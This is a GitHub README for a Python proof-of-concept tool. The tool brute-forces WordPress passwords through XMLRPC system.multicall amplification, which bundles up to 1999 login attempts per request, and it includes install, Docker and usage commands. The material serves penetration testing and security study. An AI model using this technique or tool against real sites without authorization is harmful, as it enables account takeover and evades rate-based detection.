search

aress31 / xmlrpc-bruteforcer

Multi-threaded XMLRPC brute forcer using amplification attacks targeting WordPress installations prior to version 4.4.
Apache License 2.0
116 stars 41 forks source link
bruteforce bruteforce-amplification-attack multicall pentesting python wordpress xmlrpc-bruteforcer xmlrpc-interface

readme

xmlrpc-bruteforcer

lang license

Bruteforcing CMS users' passwords via the XMLRPC interface.

This script is a PoC for the Brute Force Amplification Attack exploit against XMLRPC interfaces enabling the _system.multicall()_ method (enabled by default).

The _system.multicall()_ method allows multiple calls to be sent within a single HTTP request. Using this "wrapper", malicious attackers can carry out a large number of login attempts (bruteforce) with a minimal network impact, consequently making them stealthier and more efficient.

At the moment, the maximum number of calls which can be encapsulated within the _system.multicall()_ method without triggering a networking error is 1999 calls meaning that for each HTTP request sent 1999 different login attempts are performed.

More information about the bruteforce amplification attack can be found at:

[!IMPORTANT] This script has been sucessfully tested against WordPress versions < 4.4.

Installation

  1. Download this repository:

    git clone https://github.com/AresS31/xmlrpc-bruteforcer
cd .\xmlrpc-bruteforcer

  2. Install the dependencies:

    pip install -r requirements.txt

Running on Docker

cd .\xmlrpc-bruteforcer
docker build -t xmlrpc-bruteforcer .
docker run --rm -v $(pwd):/wordlists xmlrpc-bruteforcer -u admin -w /wordlists/wordlist.txt -t 3 -x https://wordpress.local/xmlrpc.php

Usage

python3 xmlrpc-bruteforce.py -u [username] -w [wordlist] -x [xmlrpc_intf] -t [threads_number] -c [chunks_size] -v [verbose] -h [help]
[-u]: username of the targeted user, required
[-w]: wordlist containing the passwords to try, required
[-x]: xmlrpc interface to attack, required
[-t]: number of threads to run, optional, default value: 5
[-c]: number of calls to encapsulate within a system.mullticall() call, optional, default value: 1999
[-v]: print debugging information, optional, default value: False
[-h]: print help

Roadmap

Sponsor 💖

If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next cup of coffee. ☕

It is easy, all you got to do is press the Sponsor button at the top of this page or alternatively click this link. 💸

Reporting Issues

Found a bug? I would love to squash it! 🐛

Please report all issues on the GitHub issues tracker.

Contributing

You would like to contribute to better this project? 🤩

Please submit all PRs on the GitHub pull requests tracker.

License

See LICENSE.